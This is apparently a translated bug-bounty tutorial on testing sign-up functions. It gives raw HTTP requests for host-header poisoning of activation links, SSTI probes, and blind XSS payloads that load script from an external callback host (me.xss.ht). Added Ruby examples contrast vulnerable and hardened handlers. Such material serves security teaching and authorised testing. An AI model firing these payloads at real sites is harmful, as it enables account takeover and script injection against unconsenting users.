
Bug Bounty Hunter Series: How to Test the Sign-up Function (III) and Related Tips

Richardo1o1 迪哥讲事 2023-07-11


Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author of the article accepts no legal or joint liability.

Main text

This is the third article in this series and continues to lay out the test flow and methods for vulnerabilities that may exist in the sign-up function. The earlier articles in the series are:

Sign-up function testing summary

Bug Bounty Hunter Series: How to Test the Sign-up Function

Bug Bounty Hunter Series: How to Test the Sign-up Function and Related Tips

Method 15

Try registering with a company e-mail address such as admin@company.com, then try to reach all of the company's interfaces without ever verifying admin@company.com. The question is whether the application grants access or trust based on the e-mail domain before the address has been confirmed.


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=admin@company.com&password=*****&captcha=Random&token=CSRF

Method 16

If admin@company.com is accepted as the e-mail address but the account cannot be activated, try spoofing the host header, for example with X-Forwarded-Host or X-Host. If the application builds the activation link from that header, the link in the e-mail points at your domain and the activation token reaches you as soon as the link is opened.


POST /signUp HTTP/1.1
Host: www.company.com
X-Forwarded-Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=admin@company.com&password=********&captcha=Random&token=CSRF
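The request above only pays off if the application builds its activation link from a request header. As an added example that is not from the original article, the Ruby code below shows such a link builder next to a hardened one that takes the base URL from configuration, plus the check a tester makes on the e-mail that arrives. The header names X-Forwarded-Host and X-Host come from the method; the canonical base URL, the host allowlist and the /activate?token= path are assumptions made for this example.

```ruby
require "uri"
require "securerandom"

# Request headers as the application sees them for the method 16 request
# (constructed sample, not captured traffic).
SPOOFED_REQUEST = { "Host" => "www.company.com", "X-Forwarded-Host" => "me.com" }.freeze
CLEAN_REQUEST   = { "Host" => "www.company.com" }.freeze

CANONICAL_BASE = "https://www.company.com"          # assumed deployment setting
ALLOWED_HOSTS  = %w[www.company.com company.com].freeze  # assumed allowlist

# Vulnerable builder: the first of these headers that is present chooses the
# domain in the activation e-mail. Anyone who can set X-Forwarded-Host or
# X-Host therefore decides where the activation token is sent when the link
# is opened.
def activation_link_vulnerable(headers, token)
  host = %w[X-Forwarded-Host X-Host Host].map { |h| headers[h] }.compact.first
  "https://#{host}/activate?token=#{token}"
end

# Hardened builder: the base URL is configuration, never request data. Host
# is validated against an allowlist only to reject odd requests; it is not
# used to build the link.
def activation_link_safe(headers, token, base: CANONICAL_BASE)
  host = headers["Host"].to_s.split(":").first
  raise ArgumentError, "unexpected Host header: #{host.inspect}" unless ALLOWED_HOSTS.include?(host)
  "#{base}/activate?token=#{URI.encode_www_form_component(token)}"
end

# The check a tester makes on the e-mail that arrives: does the link carry
# the token to a host other than the real one?
def link_poisoned?(link, canonical_host: URI(CANONICAL_BASE).host)
  uri = URI(link)
  token = URI.decode_www_form(uri.query.to_s).to_h["token"].to_s
  uri.host != canonical_host && !token.empty?
end

# Same spoofed request through both builders; only the vulnerable link leaks.
def demo
  token = SecureRandom.hex(16)
  { vulnerable: link_poisoned?(activation_link_vulnerable(SPOOFED_REQUEST, token)),
    safe:       link_poisoned?(activation_link_safe(SPOOFED_REQUEST, token)) }
end
```

Run `demo` to see the two outcomes side by side: the vulnerable builder emits https://me.com/activate?token=..., the hardened one keeps the canonical host regardless of any forwarded header. When testing, also try the headers one at a time, since reverse proxies often strip one name but pass another through.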

Method 17

Try inserting SSTI payloads into the username, such as {{7*7}}, {7*7} or ${7*7}, and check wherever the name is rendered (welcome e-mail, profile page) for the evaluated result 49.


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname={{7*7}}&lastname={{7*7}}&username={{7*7}}&email=me&password=*****&captcha=Random&token=CSRF

Method 18

Try inserting <% into the username. If the <% has an effect in the e-mail body (it disappears or breaks the layout), inject <%= 7 * 7 %> and see whether it renders as 49, which indicates an SSTI vulnerability in a <% %>-style engine such as ERB, EJS or JSP.
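Methods 17 and 18 both look for server-side template injection and differ only in which engine's syntax they probe. As an added example that is not from the original article, the Ruby code below shows a welcome-e-mail handler that assembles its template by string interpolation and renders it with ERB, the standard-library engine behind the <%= %> syntax of method 18, beside the fixed version, together with the classification a tester applies to the rendered text. The handler names, the e-mail wording and the probe table are constructed for this example. Under ERB the brace payloads of method 17 stay inert, which is exactly why the article probes several syntaxes.

```ruby
require "erb"

# Vulnerable sign-up handler (constructed for this example): the welcome
# e-mail template is assembled by string interpolation and then handed to
# ERB, so whatever the user typed as a username becomes template code.
def render_welcome_vulnerable(username)
  template = "Welcome, #{username}! Please confirm your address."
  ERB.new(template).result(binding)
end

# Hardened handler: the template is a fixed string, the username enters only
# as data and is HTML-escaped on output. Template syntax in it stays inert.
WELCOME_TEMPLATE = ERB.new(
  "Welcome, <%= ERB::Util.html_escape(username) %>! Please confirm your address."
)

def render_welcome_safe(username)
  WELCOME_TEMPLATE.result_with_hash(username: username)
end

# Probes from methods 17 and 18 with the text an engine emits if it evaluates
# them. The brace syntaxes belong to Jinja2/Twig/Freemarker-style engines and
# are inert under ERB; only the <%= %> probe fires against the handler above.
SSTI_PROBES = {
  "{{7*7}}"      => "49",
  "{7*7}"        => "49",
  "${7*7}"       => "49",
  "<%= 7 * 7 %>" => "49",
}.freeze

# Undo the five entities ERB::Util.html_escape produces, so an escaped echo
# of the payload still counts as "reflected, not evaluated".
def unescape_html(s)
  s.gsub("&lt;", "<").gsub("&gt;", ">").gsub("&quot;", '"').gsub("&#39;", "'").gsub("&amp;", "&")
end

# What happened to one probe in the rendered text:
#   :evaluated - the result is present and the payload literal is gone (SSTI)
#   :reflected - the payload came back verbatim or entity-encoded (no evaluation)
#   :swallowed - neither; the engine consumed the syntax without evaluating it
def classify_probe(payload, rendered)
  expected = SSTI_PROBES.fetch(payload)
  if unescape_html(rendered).include?(payload)
    :reflected
  elsif rendered.match?(/(?<!\d)#{Regexp.escape(expected)}(?!\d)/)
    :evaluated
  else
    :swallowed
  end
end

# Method 18's first step: does a bare "<%" survive, vanish, or break rendering?
# A vanished or broken tag is the signal to escalate to "<%= 7 * 7 %>".
def probe_bare_tag(render)
  out = render.call("<%")
  unescape_html(out).include?("<%") ? :reflected : :swallowed
rescue StandardError, ScriptError
  :error
end

# Run every probe through a renderer; `render` is any callable taking the username.
def probe_all(render)
  SSTI_PROBES.keys.to_h { |payload| [payload, classify_probe(payload, render.call(payload))] }
end
```

Against the vulnerable handler, `probe_all(method(:render_welcome_vulnerable))` reports :evaluated only for the <%= 7 * 7 %> probe and :reflected for the brace probes, so a tester who stopped at method 17 would have missed it. Against the fixed handler every probe is :reflected, and `probe_bare_tag` shows the distinction method 18 relies on: the bare <% survives intact in the fixed version but does not come back from the vulnerable one.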

Method 19

Try injecting a blind XSS payload into the name fields: "><script src=//me.xss.ht></script>, and check for blind XSS. The payload fires later, when staff view the name in an internal panel or an e-mail, so the result is a callback to your listener rather than anything visible in the sign-up response.


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

firstname="><script src=//me.xss.ht></script>&lastname="><script src=//me.xss.ht></script>&email=me@gmail.com&password=**************&captcha=Random&token=CSRF

Method 20

Try injecting the blind XSS payload <img src="//me.xss.ht"> into the name fields and check for blind XSS. The <img> variant only needs a resource fetch to call home, so it also reveals where the name is rendered as HTML when <script> tags are filtered.


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

firstname=<img src="//me.xss.ht">&lastname=<img src="//me.xss.ht">&email=me@gmail.com&password=**************&captcha=Random&token=CSRF

Method 21

Try injecting the blind XSS payload "><script src=//me.xss.ht></script> when setting the password. A password should never be rendered anywhere, so a callback from this field means the application displays or logs it in plaintext somewhere.


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=me&password="><script src=//me.xss.ht></script>&captcha=Random&token=CSRF
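Methods 19 to 21 rely on the stored values being rendered later in a place the tester never sees, typically a staff-facing panel or a notification e-mail, which is why the callback host is the only signal. As an added example that is not from the original article, the Ruby code below renders an internal admin table once by string interpolation and once with HTML entity encoding, and applies a string-level check for a live callback. The table layout, the stored rows and the admin view are constructed for this example; the payloads and the me.xss.ht host are the article's.

```ruby
require "erb"

# Stored profiles as an internal admin/CRM page would load them. Constructed
# sample rows carrying the two payloads from methods 19 and 20 in both name
# fields, as the article's requests do; the last row is an ordinary user.
PROFILES = [
  { firstname: %q{"><script src=//me.xss.ht></script>}, lastname: %q{"><script src=//me.xss.ht></script>}, email: "me@gmail.com" },
  { firstname: %q{<img src="//me.xss.ht">},             lastname: %q{<img src="//me.xss.ht">},             email: "me2@gmail.com" },
  { firstname: "I",                                      lastname: "am",                                     email: "plain@gmail.com" },
].freeze

CALLBACK_HOST = "me.xss.ht"

# Vulnerable admin view: fields are interpolated straight into the markup.
# The first-name payload of method 19 closes value="..." and the <input>, so
# a <script> element is created; the last-name payload of method 20 lands in
# text context, so its <img> is live as well.
def render_row_vulnerable(p)
  %(<tr><td><input value="#{p[:firstname]}"></td><td>#{p[:lastname]}</td><td>#{p[:email]}</td></tr>)
end

# Hardened view: every field is entity-encoded for HTML (ERB::Util.html_escape
# encodes & < > " '), so the same payloads render as harmless text.
def render_row_safe(p)
  h = ->(s) { ERB::Util.html_escape(s) }
  %(<tr><td><input value="#{h.(p[:firstname])}"></td><td>#{h.(p[:lastname])}</td><td>#{h.(p[:email])}</td></tr>)
end

# String-level check for a live callback: the listener host inside a real
# <script src> or <img src> element rather than inside encoded text. This is
# an approximation of what the browser does (it cannot tell an <img> quoted
# inside an attribute from one in text context); the conclusive signal is the
# request arriving at the listener.
def live_callback?(html, host = CALLBACK_HOST)
  html.match?(%r{<(?:script|img)\b[^>]*\bsrc\s*=\s*["']?(?:https?:)?//#{Regexp.escape(host)}}i)
end

# Render every stored row through a view and report which ones would call home.
def audit(render)
  PROFILES.to_h { |p| [p[:email], live_callback?(render.call(p))] }
end
```

`audit(method(:render_row_vulnerable))` flags both payload rows and clears the ordinary user; `audit(method(:render_row_safe))` clears all three, because the encoded payload never becomes an element. The same pattern applies to the password field of method 21: if an internal view interpolates it into HTML, it is both an XSS sink and evidence that the password is stored or logged in plaintext.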

References

https://rohitcoder.medium.com/facebook-workplace-bug-exposed-offsite-employee-events-sensitive-emails-putting-employees-at-risk-813d77a0c0ab

https://gauravnarwani.com/injecting-6200-to-1200/

https://verneet.com/fuzzing-77-till-p1/

https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html

https://hackerone.com/reports/423541

https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870

https://hackerone.com/reports/251224

https://twitter.com/intigriti/status/1072181482028978177

https://hackerone.com/reports/7995

